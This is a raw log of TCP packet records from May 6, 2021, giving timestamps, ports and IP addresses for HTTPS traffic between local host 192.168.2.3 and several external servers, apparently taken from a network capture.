May 6, 2021 17:58:11.371207952 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.371366024 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.372327089 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.372350931 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.372432947 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.373411894 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.373441935 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.373517990 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.374491930 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.374519110 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.374603033 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.375663996 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.375689983 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.375773907 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.376699924 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.376727104 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.376797915 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.377849102 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.377883911 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.377940893 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.378026009 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.378931999 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.378962040 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.379090071 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.380004883 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.380028009 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.380105019 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.381117105 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.381141901 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.381228924 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.382200003 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.382224083 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.382302999 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.383212090 CEST	443	49732	143.204.209.88	192.168.2.3
May 6, 2021 17:58:11.383233070 CEST	443	49731	143.204.209.88	192.168.2.3
May 6, 2021 17:58:11.383315086 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.383335114 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.383353949 CEST	49731	443	192.168.2.3	143.204.209.88
May 6, 2021 17:58:11.383363008 CEST	49732	443	192.168.2.3	143.204.209.88
May 6, 2021 17:58:11.383409977 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.384299994 CEST	49732	443	192.168.2.3	143.204.209.88
May 6, 2021 17:58:11.384458065 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.384514093 CEST	49731	443	192.168.2.3	143.204.209.88
May 6, 2021 17:58:11.384532928 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.384826899 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.384924889 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.385693073 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.385875940 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.394923925 CEST	443	49731	143.204.209.88	192.168.2.3
May 6, 2021 17:58:11.395123005 CEST	49731	443	192.168.2.3	143.204.209.88
May 6, 2021 17:58:11.414530993 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.414578915 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.414588928 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.414599895 CEST	443	49732	143.204.209.88	192.168.2.3
May 6, 2021 17:58:11.414706945 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.414741993 CEST	49732	443	192.168.2.3	143.204.209.88
May 6, 2021 17:58:11.426894903 CEST	443	49732	143.204.209.88	192.168.2.3
May 6, 2021 17:58:11.427042961 CEST	443	49732	143.204.209.88	192.168.2.3
May 6, 2021 17:58:11.427159071 CEST	443	49732	143.204.209.88	192.168.2.3
May 6, 2021 17:58:11.427179098 CEST	443	49732	143.204.209.88	192.168.2.3
May 6, 2021 17:58:11.427180052 CEST	49732	443	192.168.2.3	143.204.209.88
May 6, 2021 17:58:11.427330971 CEST	49732	443	192.168.2.3	143.204.209.88
May 6, 2021 17:58:11.427438021 CEST	443	49731	143.204.209.88	192.168.2.3
May 6, 2021 17:58:11.428056002 CEST	443	49731	143.204.209.88	192.168.2.3
May 6, 2021 17:58:11.428092003 CEST	443	49731	143.204.209.88	192.168.2.3
May 6, 2021 17:58:11.428111076 CEST	443	49731	143.204.209.88	192.168.2.3
May 6, 2021 17:58:11.428227901 CEST	49731	443	192.168.2.3	143.204.209.88
May 6, 2021 17:58:11.429073095 CEST	443	49732	143.204.209.88	192.168.2.3
May 6, 2021 17:58:11.429091930 CEST	443	49732	143.204.209.88	192.168.2.3
May 6, 2021 17:58:11.429167986 CEST	49732	443	192.168.2.3	143.204.209.88
May 6, 2021 17:58:11.429822922 CEST	443	49731	143.204.209.88	192.168.2.3
May 6, 2021 17:58:11.429856062 CEST	443	49731	143.204.209.88	192.168.2.3
May 6, 2021 17:58:11.429972887 CEST	49731	443	192.168.2.3	143.204.209.88
May 6, 2021 17:58:11.441669941 CEST	49732	443	192.168.2.3	143.204.209.88
May 6, 2021 17:58:11.441931009 CEST	49731	443	192.168.2.3	143.204.209.88
May 6, 2021 17:58:11.442131996 CEST	49732	443	192.168.2.3	143.204.209.88
May 6, 2021 17:58:11.442367077 CEST	49732	443	192.168.2.3	143.204.209.88
May 6, 2021 17:58:11.442552090 CEST	49731	443	192.168.2.3	143.204.209.88
May 6, 2021 17:58:11.465253115 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.466892958 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.467865944 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.467998981 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.468168974 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.468265057 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.483052015 CEST	443	49731	143.204.209.88	192.168.2.3
May 6, 2021 17:58:11.483071089 CEST	443	49731	143.204.209.88	192.168.2.3
May 6, 2021 17:58:11.483079910 CEST	443	49731	143.204.209.88	192.168.2.3
May 6, 2021 17:58:11.483104944 CEST	443	49732	143.204.209.88	192.168.2.3
May 6, 2021 17:58:11.483156919 CEST	443	49732	143.204.209.88	192.168.2.3
May 6, 2021 17:58:11.483166933 CEST	443	49732	143.204.209.88	192.168.2.3
May 6, 2021 17:58:11.483185053 CEST	49731	443	192.168.2.3	143.204.209.88
May 6, 2021 17:58:11.483206987 CEST	49732	443	192.168.2.3	143.204.209.88
May 6, 2021 17:58:11.483227015 CEST	49732	443	192.168.2.3	143.204.209.88
May 6, 2021 17:58:11.484040022 CEST	49731	443	192.168.2.3	143.204.209.88
May 6, 2021 17:58:11.484081984 CEST	49732	443	192.168.2.3	143.204.209.88
May 6, 2021 17:58:11.484271049 CEST	443	49731	143.204.209.88	192.168.2.3
May 6, 2021 17:58:11.484637976 CEST	443	49731	143.204.209.88	192.168.2.3
May 6, 2021 17:58:11.484731913 CEST	49731	443	192.168.2.3	143.204.209.88
May 6, 2021 17:58:11.487833023 CEST	443	49732	143.204.209.88	192.168.2.3
May 6, 2021 17:58:11.487881899 CEST	443	49732	143.204.209.88	192.168.2.3
May 6, 2021 17:58:11.487905979 CEST	443	49732	143.204.209.88	192.168.2.3
May 6, 2021 17:58:11.487916946 CEST	443	49732	143.204.209.88	192.168.2.3
May 6, 2021 17:58:11.487950087 CEST	49732	443	192.168.2.3	143.204.209.88
May 6, 2021 17:58:11.487978935 CEST	49732	443	192.168.2.3	143.204.209.88
May 6, 2021 17:58:11.507808924 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.508776903 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.508968115 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.508981943 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.509057999 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.525064945 CEST	443	49731	143.204.209.88	192.168.2.3
May 6, 2021 17:58:11.525089025 CEST	443	49732	143.204.209.88	192.168.2.3
May 6, 2021 17:58:11.533353090 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.533371925 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.533463001 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.534426928 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.534519911 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.534564018 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.534614086 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.534674883 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.572879076 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.577169895 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.619894981 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.620078087 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.620110035 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.620194912 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.620615005 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.620681047 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.620779991 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.620790005 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.621604919 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.621629953 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.621685028 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.622550011 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.622606993 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.622627974 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.622652054 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.623526096 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.623549938 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.623611927 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.624484062 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.624507904 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.624572992 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.625475883 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.625500917 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.625590086 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.626408100 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.626434088 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.626497984 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.627330065 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.627384901 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.627388000 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.627600908 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.628294945 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.628319979 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.628406048 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.629270077 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.629292011 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.629467010 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.630247116 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.630270004 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.630362034 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.631191015 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.631216049 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.631300926 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.632167101 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.632191896 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.632280111 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.633120060 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.633145094 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.633217096 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.634072065 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.634098053 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.634160995 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.635009050 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.635032892 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.635097980 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.635987043 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.636008024 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.636074066 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.636991024 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.637013912 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.637109041 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.637912989 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.637938023 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.637976885 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.638031960 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.638844013 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.638869047 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.638925076 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.639874935 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.639899969 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.640785933 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.640810013 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.640851021 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.640882015 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.641753912 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.641778946 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.641849041 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.642693043 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.642716885 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.642774105 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.643654108 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.643677950 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.643745899 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.644607067 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.644649029 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.644723892 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.644735098 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.645673990 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.645713091 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.645792007 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.646344900 CEST	49733	443	192.168.2.3	35.181.18.61
May 6, 2021 17:58:11.646459103 CEST	49734	443	192.168.2.3	35.181.18.61
May 6, 2021 17:58:11.646569014 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.646588087 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.646646023 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.647506952 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.647527933 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.647593021 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.648447037 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.648467064 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.648550034 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.649458885 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.649491072 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.649565935 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.650367022 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.650387049 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.650448084 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.661168098 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.661181927 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.661400080 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.661777020 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.661809921 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.662444115 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.691054106 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.696665049 CEST	443	49733	35.181.18.61	192.168.2.3
May 6, 2021 17:58:11.696846962 CEST	49733	443	192.168.2.3	35.181.18.61
May 6, 2021 17:58:11.696964025 CEST	443	49734	35.181.18.61	192.168.2.3
May 6, 2021 17:58:11.697293043 CEST	49734	443	192.168.2.3	35.181.18.61
May 6, 2021 17:58:11.698158979 CEST	49734	443	192.168.2.3	35.181.18.61
May 6, 2021 17:58:11.699065924 CEST	49733	443	192.168.2.3	35.181.18.61
May 6, 2021 17:58:11.732552052 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.732578039 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.732614994 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.732634068 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.732706070 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.732747078 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.732810020 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.732831955 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.732850075 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.732894897 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.732930899 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.748053074 CEST	443	49734	35.181.18.61	192.168.2.3
May 6, 2021 17:58:11.748178959 CEST	443	49734	35.181.18.61	192.168.2.3
May 6, 2021 17:58:11.748203039 CEST	443	49734	35.181.18.61	192.168.2.3
May 6, 2021 17:58:11.748223066 CEST	443	49734	35.181.18.61	192.168.2.3
May 6, 2021 17:58:11.748234034 CEST	443	49734	35.181.18.61	192.168.2.3
May 6, 2021 17:58:11.748258114 CEST	49734	443	192.168.2.3	35.181.18.61
May 6, 2021 17:58:11.748287916 CEST	49734	443	192.168.2.3	35.181.18.61
May 6, 2021 17:58:11.748697042 CEST	443	49733	35.181.18.61	192.168.2.3
May 6, 2021 17:58:11.748905897 CEST	443	49733	35.181.18.61	192.168.2.3
May 6, 2021 17:58:11.748925924 CEST	443	49733	35.181.18.61	192.168.2.3
May 6, 2021 17:58:11.748944044 CEST	443	49733	35.181.18.61	192.168.2.3
May 6, 2021 17:58:11.748955965 CEST	443	49733	35.181.18.61	192.168.2.3
May 6, 2021 17:58:11.748979092 CEST	49733	443	192.168.2.3	35.181.18.61
May 6, 2021 17:58:11.749008894 CEST	49733	443	192.168.2.3	35.181.18.61
May 6, 2021 17:58:11.758800030 CEST	49733	443	192.168.2.3	35.181.18.61
May 6, 2021 17:58:11.758893013 CEST	49734	443	192.168.2.3	35.181.18.61
May 6, 2021 17:58:11.769961119 CEST	49733	443	192.168.2.3	35.181.18.61
May 6, 2021 17:58:11.770049095 CEST	49734	443	192.168.2.3	35.181.18.61
May 6, 2021 17:58:11.770221949 CEST	49733	443	192.168.2.3	35.181.18.61
May 6, 2021 17:58:11.771598101 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:11.779030085 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.784048080 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.791917086 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.792043924 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.792232990 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.792332888 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.808789015 CEST	443	49733	35.181.18.61	192.168.2.3
May 6, 2021 17:58:11.808901072 CEST	49733	443	192.168.2.3	35.181.18.61
May 6, 2021 17:58:11.809195042 CEST	443	49734	35.181.18.61	192.168.2.3
May 6, 2021 17:58:11.809272051 CEST	49734	443	192.168.2.3	35.181.18.61
May 6, 2021 17:58:11.821727037 CEST	443	49733	35.181.18.61	192.168.2.3
May 6, 2021 17:58:11.821743965 CEST	443	49733	35.181.18.61	192.168.2.3
May 6, 2021 17:58:11.821839094 CEST	49733	443	192.168.2.3	35.181.18.61
May 6, 2021 17:58:11.821938038 CEST	443	49734	35.181.18.61	192.168.2.3
May 6, 2021 17:58:11.822002888 CEST	49734	443	192.168.2.3	35.181.18.61
May 6, 2021 17:58:11.822025061 CEST	49733	443	192.168.2.3	35.181.18.61
May 6, 2021 17:58:11.822211027 CEST	49734	443	192.168.2.3	35.181.18.61
May 6, 2021 17:58:11.823030949 CEST	443	49733	35.181.18.61	192.168.2.3
May 6, 2021 17:58:11.823103905 CEST	49733	443	192.168.2.3	35.181.18.61
May 6, 2021 17:58:11.824889898 CEST	49733	443	192.168.2.3	35.181.18.61
May 6, 2021 17:58:11.826433897 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.832966089 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.833003998 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.833018064 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.833092928 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.833143950 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.847384930 CEST	49736	443	192.168.2.3	34.202.206.65
May 6, 2021 17:58:11.847481966 CEST	49737	443	192.168.2.3	34.202.206.65
May 6, 2021 17:58:11.859200001 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.859221935 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.859255075 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.859275103 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.859302998 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.859321117 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.859355927 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.859414101 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.859420061 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.860049963 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.860145092 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.869669914 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.869704008 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.869846106 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.872692108 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.875900984 CEST	443	49733	35.181.18.61	192.168.2.3
May 6, 2021 17:58:11.877059937 CEST	443	49733	35.181.18.61	192.168.2.3
May 6, 2021 17:58:11.877248049 CEST	49733	443	192.168.2.3	35.181.18.61
May 6, 2021 17:58:11.913510084 CEST	443	49734	35.181.18.61	192.168.2.3
May 6, 2021 17:58:11.915736914 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.915757895 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.915776014 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.915791035 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.915798903 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.915828943 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.915883064 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.960266113 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:11.960426092 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:11.983254910 CEST	443	49737	34.202.206.65	192.168.2.3
May 6, 2021 17:58:11.983272076 CEST	443	49736	34.202.206.65	192.168.2.3
May 6, 2021 17:58:11.983377934 CEST	49737	443	192.168.2.3	34.202.206.65
May 6, 2021 17:58:11.983402014 CEST	49736	443	192.168.2.3	34.202.206.65
May 6, 2021 17:58:11.984121084 CEST	49737	443	192.168.2.3	34.202.206.65
May 6, 2021 17:58:11.984774113 CEST	49736	443	192.168.2.3	34.202.206.65
May 6, 2021 17:58:12.117434025 CEST	443	49737	34.202.206.65	192.168.2.3
May 6, 2021 17:58:12.118176937 CEST	443	49736	34.202.206.65	192.168.2.3
May 6, 2021 17:58:12.119628906 CEST	443	49737	34.202.206.65	192.168.2.3
May 6, 2021 17:58:12.119653940 CEST	443	49737	34.202.206.65	192.168.2.3
May 6, 2021 17:58:12.119688988 CEST	443	49737	34.202.206.65	192.168.2.3
May 6, 2021 17:58:12.119709015 CEST	443	49737	34.202.206.65	192.168.2.3
May 6, 2021 17:58:12.119725943 CEST	443	49737	34.202.206.65	192.168.2.3
May 6, 2021 17:58:12.119762897 CEST	49737	443	192.168.2.3	34.202.206.65
May 6, 2021 17:58:12.119803905 CEST	49737	443	192.168.2.3	34.202.206.65
May 6, 2021 17:58:12.120264053 CEST	443	49736	34.202.206.65	192.168.2.3
May 6, 2021 17:58:12.120282888 CEST	443	49736	34.202.206.65	192.168.2.3
May 6, 2021 17:58:12.120323896 CEST	443	49736	34.202.206.65	192.168.2.3
May 6, 2021 17:58:12.120345116 CEST	443	49736	34.202.206.65	192.168.2.3
May 6, 2021 17:58:12.120358944 CEST	443	49736	34.202.206.65	192.168.2.3
